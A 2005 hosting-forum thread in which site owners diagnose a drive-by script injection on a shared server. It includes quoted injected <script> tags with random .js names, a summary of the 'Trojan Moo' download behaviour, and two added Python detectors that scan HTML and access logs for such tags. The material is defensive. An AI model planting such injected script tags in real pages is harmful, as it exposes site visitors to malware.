Blackcat Posted September 5, 2005

Today three strange things happened on my blog (http://blackcat.bloggy.biz):
1- The folder /archive/images had become public (the images were not supposed to be shown in a list; hotlink protection was even used to forbid the use of my domain's bandwidth).
2- A user made a complaint about the forum (http://bloggy.biz/board), saying that "in at least three or four moments, a trojan tried to enter my PC, the so-called ByteVerify that exploits the Java of the forum to attack a computer". According to my experience, phpBB does not use any Java, am I right? Should I think it is a problem of this user only (in her PC, maybe)?
3- Another user, exploring the folder mentioned above, the one that suddenly became visible to the public, told me that "my firewall informed me that an application called m00 was attempting to access the internet. I never saw this .exe before, but I noticed it was created on my desktop at the moment I opened the folder. I tried to delete it, but it was impossible. This application tried further to access I don't know which process, so I denied access to it and finally deleted m00. There has been another problem, my task manager: I used it to close the explorer page opened to see your images, which was not responding. Everything has disappeared, even the taskbar. Even restarting the PC, nothing improved; I was obliged to reboot it loading the last known working configuration."
I really don't know what's happening: my Norton Internet Security and Personal Firewall did not find anything suspicious. Could you maybe help me?
TCH-Thomas Posted September 5, 2005

Hi Blackcat, I don't speak Italian so I don't know if this thread is relevant to your issue, but from what I understand from reading your post, I would check it out.
Blackcat Posted September 5, 2005

> Hi Blackcat, I don't speak Italian so I don't know if this thread is relevant to your issue, but from what I understand from reading your post, I would check it out.

Hi Thomas! How are you? Well, I double-checked as your linked thread suggests, but found nothing, even in the source code of the index.php file. I really don't know where else to look to find any answer.
stevevan Posted September 5, 2005

I have to ask the obvious... you ARE running the most current, up-to-date version of phpBB, right?
Blackcat Posted September 5, 2005

> I have to ask the obvious... you ARE running the most current, up-to-date version of phpBB, right?

Absolutely YES!!!
stevevan Posted September 6, 2005

I assumed as much, but just wanted to be sure. Hopefully one of the more knowledgeable bloggers will chime in, but it sounds to me like somehow your administrative password may possibly have gotten compromised. As I don't have a blog, I cannot really say much beyond what immediately jumps out at me. (But I think that you already thought of that, too!)
TweezerMan Posted September 6, 2005

> 1- The folder /archive/images had become public (the images were not supposed to be shown in a list; hotlink protection was even used to forbid the use of my domain's bandwidth).

The directory is publicly viewable, which isn't quite the same as 'become public'. Hotlinking will not prevent someone from viewing the directory by itself. If you don't want the directory to be viewable, you need to go into the Index Manager in your CPanel and set that directory to "No Indexes".

> 2- A user made a complaint about the forum (http://bloggy.biz/board), saying that "in at least three or four moments, a trojan tried to enter my PC, the so-called ByteVerify that exploits the Java of the forum to attack a computer". According to my experience, phpBB does not use any Java, am I right? Should I think it is a problem of this user only (in her PC, maybe)?

It's not that phpBB does or doesn't use Java - the user is saying that something on one or more of your forum pages is attempting to download a trojan. A link to a specific page where this is occurring would be extremely helpful, as it could be verified whether or not there is malicious code in the page.

> 3- Another user, exploring the folder mentioned above, the one that suddenly became visible to the public, told me that "my firewall informed me that an application called m00 was attempting to access the internet. I never saw this .exe before, but I noticed it was created on my desktop at the moment I opened the folder. I tried to delete it, but it was impossible. This application tried further to access I don't know which process, so I denied access to it and finally deleted m00. There has been another problem, my task manager: I used it to close the explorer page opened to see your images, which was not responding. Everything has disappeared, even the taskbar. Even restarting the PC, nothing improved; I was obliged to reboot it loading the last known working configuration."

Your user was infected by a trojan, known as 'Trojan Moo':
* Trojan is carried inside of an infected .jpg file
* Attempts to download a file from a URL specified by the author and save it as "m00.exe"
* Executes m00.exe

Opening the folder should not have triggered this trojan - I think you'd have to actually view an infected .jpg file. It's possible that the user had already been infected and the timing of 'm00.exe' appearing on the desktop at the same time the /images folder was opened was merely coincidence.

> I really don't know what's happening: my Norton Internet Security and Personal Firewall did not find anything suspicious.

You may not see anything on your PC - the problems (if they exist) would be with files on the server.
stevevan Posted September 6, 2005

Thanks for the info, David! (Steve puts info away in back memory bank!)
Blackcat Posted September 6, 2005

David... no words for your great answer, except an enormous THANK YOU!!!!! Well, now there are two users complaining about the forum. Both have problems with the home page (http://bloggy.biz/board): firewalls and antivirus go crazy, programs try to install themselves on the PC and so on. I made a search through the PHP code, but I have not been able to find anything regarding hidden links.
TweezerMan Posted September 6, 2005

Looking at "View Source" of your phpBB main page, this line is the very first line of code, even before the !DOCTYPE or <html> tag:

    <script language=JavaScript src=/rmpcugt.js></script>

The link to the script does not appear to be valid now. But the position of this script, ahead of all other HTML code, in an invalid place for a <script> tag, and the odd, pseudo-random name of the script lead me to suspect that this is not your code, but code that a malicious attacker may have inserted into your site.
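The check TweezerMan describes (a script tag sitting before the DOCTYPE or <html> tag with a random-looking name) can be automated over several fetches of the same page, since later posts note that the tag only appears on some responses. This is an added example, not code from anyone in this thread; the sample bodies are constructed from the HTML OldTimer pastes further down, and the "6 to 8 lowercase letters" name pattern is my own heuristic drawn from the names quoted here (rmpcugt.js, gvspmjf.js, kslljmr.js).

```python
import re

# Constructed sample responses. The first body is the page OldTimer pasted in
# this thread (script tag before <html>); the second is a clean page with a
# legitimate script inside <head>, which must not be flagged.
INJECTED_PAGE = (
    "<script language=JavaScript src=/kslljmr.js></script>\n"
    "<html>\n<head>\n<title>ontalkradio.com</title>\n</head>\n"
    "<body>\nontalkradio.com\n</body>\n</html>\n")
CLEAN_PAGE = (
    "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\">\n"
    "<html>\n<head>\n<title>ontalkradio.com</title>\n"
    "<script src=\"/js/menu.js\"></script>\n</head>\n"
    "<body>\nontalkradio.com\n</body>\n</html>\n")

# Any <script ... src=...> tag, quoted or not (the injected one is unquoted).
SCRIPT_SRC = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
# Heuristic (assumption): root-level, 6-8 lowercase letters, like rmpcugt.js.
RANDOM_JS = re.compile(r'^/[a-z]{6,8}\.js$')


def scripts_before_document(html):
    """Return src values of <script> tags placed before <!DOCTYPE or <html>."""
    lowered = html.lower()
    starts = [p for p in (lowered.find('<!doctype'), lowered.find('<html')) if p != -1]
    prefix = html[:min(starts)] if starts else html
    return [m.group(1) for m in SCRIPT_SRC.finditer(prefix)]


def injected_scripts(html):
    """Pre-document scripts whose src also matches the random-name pattern."""
    return [src for src in scripts_before_document(html) if RANDOM_JS.match(src)]


def scan_responses(bodies):
    """Check several fetches of one page; return {src: times seen}, because the
    tag is only present on a fraction of responses."""
    seen = {}
    for body in bodies:
        for src in injected_scripts(body):
            seen[src] = seen.get(src, 0) + 1
    return seen


if __name__ == '__main__':
    # Simulate five fetches, two of which came back with the injected tag.
    print(scan_responses([CLEAN_PAGE, INJECTED_PAGE, CLEAN_PAGE, CLEAN_PAGE, INJECTED_PAGE]))
```

In practice the bodies would come from repeated HTTP fetches of the same URL; a non-empty result is the signal to compare the served HTML against the files on disk, since the tag was not found in any template.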
Blackcat Posted September 6, 2005

> Looking at "View Source" of your phpBB main page, this line is the very first line of code, even before the !DOCTYPE or <html> tag:
>
>     <script language=JavaScript src=/rmpcugt.js></script>
>
> The link to the script does not appear to be valid now. But the position of this script, ahead of all other HTML code, in an invalid place for a <script> tag, and the odd, pseudo-random name of the script lead me to suspect that this is not your code, but code that a malicious attacker may have inserted into your site.

You're right!!! I did not put this script in my header... And, honestly, I did not make my search in the header, but just in the page body. As soon as my CPanel works again (now I think something strange is happening, I have an error code "License File Expired") I will delete it. Thank you again.
TCH-Bruce Posted September 6, 2005

> As soon as my CPanel works again (now I think something strange is happening, I have an error code "License File Expired") I will delete it.

Open a ticket with the help desk and report this please.
Blackcat Posted September 6, 2005

> Open a ticket with the help desk and report this please.

Done.
Blackcat Posted September 6, 2005

Ok. I've tried to find where this malicious script has been inserted. I could not find it. Moreover, in my first page's source code (you mean HTML, right?) it does not appear anymore. I took a look also in my templates folder and in the include folder, but nothing.
TweezerMan Posted September 6, 2005

I no longer see the <script> tag either. Maybe you or the Help Desk did something that fixed phpBB back to the way it was?
Blackcat Posted September 6, 2005

> I no longer see the <script> tag either. Maybe you or the Help Desk did something that fixed phpBB back to the way it was?

I could not do anything until the Help Desk fixed my problem with CPanel. And I did not even ask them to remove the script. I am starting to worry about the safety of my site: may I have been hacked or something?
OldTimer Posted September 6, 2005

I haven't used phpBB in a while. But one of the first things you could do is change your admin password. Greg
Blackcat Posted September 7, 2005

> I haven't used phpBB in a while. But one of the first things you could do is change your admin password. Greg

Hi Greg, I did it two weeks ago, also because I was out of town and I forgot it. Now the problem is becoming wider. It seems to affect also my JPEG folders on two different blogs...
Blackcat Posted September 7, 2005

Just a question on a small doubt... In the awstats of all subdomains, I found, in the 404 pages listed, hundreds of .js scripts. How could someone possibly force readers to download a script (not present in my folders) when they read random pages, EVERY page of the domain?
curtis Posted September 7, 2005

Blackcat, in your awstats under 404 errors, is this what you are getting? I am not using phpBB or any other forum or blog. I started getting all these 404 .js errors about a week ago.
Blackcat Posted September 7, 2005

> Blackcat, in your awstats under 404 errors, is this what you are getting? I am not using phpBB or any other forum or blog. I started getting all these 404 .js errors about a week ago.

Exactly the same!!! Hundreds of odd .js scripts!!! And, moreover, I found in Awstats someone called "Mrbean" who appears to be logged into my site as an authenticated user. More than obvious, I don't know such a user. My .js scripts, anyway, started in August, about the middle of the month. This "Mrbean" authenticated for the last time on August 16th. And yesterday another authenticated user logged in. Name = "". It's getting worse and worse.
curtis Posted September 7, 2005

Well, I did start getting all these .js errors back in August. I don't check the stats for this site very often. I don't have any authenticated user for August or September. I went through my site page by page looking at the source code and could find no reference to any .js file. I have Viper guestbook installed and thought it may be the problem, so I disabled it but continued to receive the errors. I am about at a loss as to what to do next.
curtis Posted September 9, 2005

Blackcat, did you find a fix or the source of the .js error problem? Yesterday I tried changing some code on my index.html page to see if that would have any effect. I then tried to validate the page, but the validator said I had a JavaScript before the DOCTYPE. I looked at the page source but didn't see any JavaScript. Again I tried to validate, and the page validated with no problem. If you or anyone has suggestions, I'm open to trying most anything.
Blackcat Posted September 9, 2005

I have the same problem, Curtis. Moreover, complaints are becoming constant and increasing. I think the script is not put on a specific page, because if so, whoever put the script must have access to FTP or CPanel, as I have .js problems on weblogs (running Movable Type), on the board (running phpBB) and on my home page made with FrontPage. Nor should we have so many 404 .js pages. I'm going crazy, working till late at night from home to find a possible solution, but nothing helps. The guys at TCH are working on a ticket I opened, but they also did not find any malicious file. Anyway, whoever made the changes did not hack or crack any site. This is a very annoying "joke", made just to disturb users and readers. (If I found him/her, I'd strangle him/her.) There is apparently no code inserted, no script, no iframe. Nothing. But the problem still persists...
Blackcat Posted September 9, 2005

Anyway, it is a nice game to pass the time: reload the validator page once a minute and the script disappears. Then a minute later it comes back with another name. And your page doesn't show anything.
OldTimer Posted September 9, 2005

I see at http://blackcat.bloggy.biz/ there is now a gvspmjf.js at the top of the page. But it comes up 404. I'm not getting any warnings from Norton. I'm using Firefox. Have you asked the users what browser they are using? And just maybe that code is being added to your database. Have you taken a look there? Just ideas, I'm by far no expert on this stuff. Greg
Blackcat Posted September 9, 2005

> I see at http://blackcat.bloggy.biz/ there is now a gvspmjf.js at the top of the page. But it comes up 404. I'm not getting any warnings from Norton. I'm using Firefox. Have you asked the users what browser they are using? And just maybe that code is being added to your database. Have you taken a look there? Just ideas, I'm by far no expert on this stuff. Greg

Yes! Of course it shows, but randomly! And, I swear, there is no script in the source code of the page! All files are 404, and this is why some firewalls (including mine) did not even inform the user of this download attempt. I don't think it is a problem of browser or OS: I already asked the forum users and there are almost all cases and sortings. Even for the DB: the weblogs have a database, the board has another, different database, and the home page doesn't have any. But all three have the same problem. Thank you for your ideas, Greg. The more we are, the faster we beat .js!!!
curtis Posted September 9, 2005

I'm about the same as Blackcat. 2 databases, 1 for a guestbook and 1 for site search. 150 pages that use no DB - all getting the .js errors. I am far from being an expert on DBs, but I did look through both and found nothing that looked suspicious. The site is on server 60.
Blackcat Posted September 9, 2005

> The site is on server 60.

Me too!!!!
OldTimer Posted September 9, 2005 Share Posted September 9, 2005 (edited) That's odd I'm also on server 60 But I don't have a site up at the moment just a html page. I'll go take a look. The random part does seem odd. Greg ok just checked and I've got it too. ><script language=JavaScript src=/kslljmr.js></script> <html> <head> <title>ontalkradio.com</title> </head> <body> ontalkradio.com </body> </html> Edited September 9, 2005 by OldTimer Link to comment Share on other sites More sharing options...
curtis Posted September 9, 2005

Maybe I should clarify my last post a little. When I said I get the .js error on every page, it has shown up for every page, but not every page on every visit. When someone visits the site, according to the error log, I have 1 .js error regardless of how many pages the visitor views. I hope this doesn't sound as confusing to you as it does to me.
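The awstats symptom described by Blackcat and curtis (hundreds of 404s for randomly named root-level .js files, about one per visitor regardless of pages viewed) can be pulled out of the raw access log rather than the stats summary, which also shows which page's HTML carried the tag via the Referer. This is an added example, not anything posted in the thread: the log lines are constructed in Apache combined format using documentation IP ranges and the script names quoted above, and the 6-8 lowercase-letter name pattern is my own heuristic.

```python
import re
from collections import Counter, defaultdict

# Constructed sample access-log lines (Apache combined format). Addresses are
# documentation ranges; the .js names are the ones quoted in this thread.
# /js/menu.js is a genuinely missing file and must not be counted.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Sep/2005:10:15:02 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.5 - - [07/Sep/2005:10:15:03 +0000] "GET /rmpcugt.js HTTP/1.1" 404 1043 "http://blackcat.bloggy.biz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.5 - - [07/Sep/2005:10:15:20 +0000] "GET /board/ HTTP/1.1" 200 8123 "http://blackcat.bloggy.biz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.7 - - [07/Sep/2005:11:02:41 +0000] "GET /archive/images/ HTTP/1.1" 200 2210 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
198.51.100.7 - - [07/Sep/2005:11:02:42 +0000] "GET /gvspmjf.js HTTP/1.1" 404 1043 "http://blackcat.bloggy.biz/archive/images/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
192.0.2.9 - - [07/Sep/2005:12:30:00 +0000] "GET /js/menu.js HTTP/1.1" 404 1043 "http://blackcat.bloggy.biz/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
192.0.2.9 - - [07/Sep/2005:12:30:01 +0000] "GET /board/viewtopic.php?t=12 HTTP/1.1" 200 9001 "http://blackcat.bloggy.biz/board/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$')
# Heuristic (assumption): root-level, 6-8 lowercase letters, like rmpcugt.js.
RANDOM_JS = re.compile(r'^/[a-z]{6,8}\.js$')


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def injected_script_hits(log_text):
    """Entries that look like a browser fetching the injected (missing) script."""
    hits = []
    for raw in log_text.splitlines():
        entry = parse_line(raw)
        if entry and entry['status'] == '404' and RANDOM_JS.match(entry['path']):
            hits.append(entry)
    return hits


def hits_per_client(log_text):
    """Suspicious .js 404s per client address; the thread reports about one per visit."""
    return Counter(h['ip'] for h in injected_script_hits(log_text))


def script_names(log_text):
    """Distinct random names seen, to compare with the awstats 404 list."""
    return sorted({h['path'].lstrip('/') for h in injected_script_hits(log_text)})


def referring_pages(log_text):
    """Map each injected script to the pages whose HTML triggered the fetch."""
    pages = defaultdict(set)
    for h in injected_script_hits(log_text):
        pages[h['path']].add(h['referer'])
    return {k: sorted(v) for k, v in pages.items()}


if __name__ == '__main__':
    for ip, n in hits_per_client(SAMPLE_LOG).items():
        print(f'{ip}: {n} suspicious .js 404(s)')
    print('script names:', script_names(SAMPLE_LOG))
    print('referring pages:', referring_pages(SAMPLE_LOG))
```

The Referer column is the useful part for a site owner: it lists the exact pages that served the tag, including static ones with no database behind them, which is the evidence several posters here were missing.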
OldTimer Posted September 9, 2005

I just checked my page again and now it's not there. But we are all on server 60?
Blackcat Posted September 9, 2005

> I just checked my page again and now it's not there. But we are all on server 60?

Yes, we are all on server 60. Also my script appears and disappears randomly... like Curtis explained.
abinidi Posted September 9, 2005 Share Posted September 9, 2005 (edited) Have you tried opening a help desk ticket, and pointing them at this thread? I wonder if the admins are aware thatthere is a problem, and that server 60 seems to be the one affected.... EDIT: I realize that you opened a help desk ticket before, but they might think that the problem you opened the ticket about is already resolved. It seems that there might be a larger issue here, and pointing them to this thread might be helpful. Just my 2cents worth!! Edited September 9, 2005 by abinidi Link to comment Share on other sites More sharing options...
cajunman4life Posted September 9, 2005

I think Paul is on to something here. Perhaps this is larger than just a few accounts.
mitten Posted September 9, 2005 Share Posted September 9, 2005 (edited) I think Paul is on to something here. Perhaps this is larger than just a few accounts. <{POST_SNAPBACK}> Yup. I've been having this same trouble - for the last 4 or so weeks, loads and loads of 404 reports for randomly named scripts with names like abcdef.js and now I'm getting reports from users whos are crashing or getting virus alerts when they visit the site. I haven't been able to figure out what's going on either. I thought maybe it was something with an old installation of punBB that we don't use anymore, but that doesn't seem to be it. Are you all opening tickets on this? Is that the best course of action at this point? It sure does look more like someone has put malicious code on the server, not on our sites per se. (The site in question is http://martinirepublic.com) Edited September 9, 2005 by mitten Link to comment Share on other sites More sharing options...
Head Guru Posted September 15, 2005

TCH clients - please continue to follow progress on this thread here: http://www.totalchoicehosting.com/forums/i...showtopic=22710 If you do not have the password, please IM myself or another staff member. We are making progress. Bill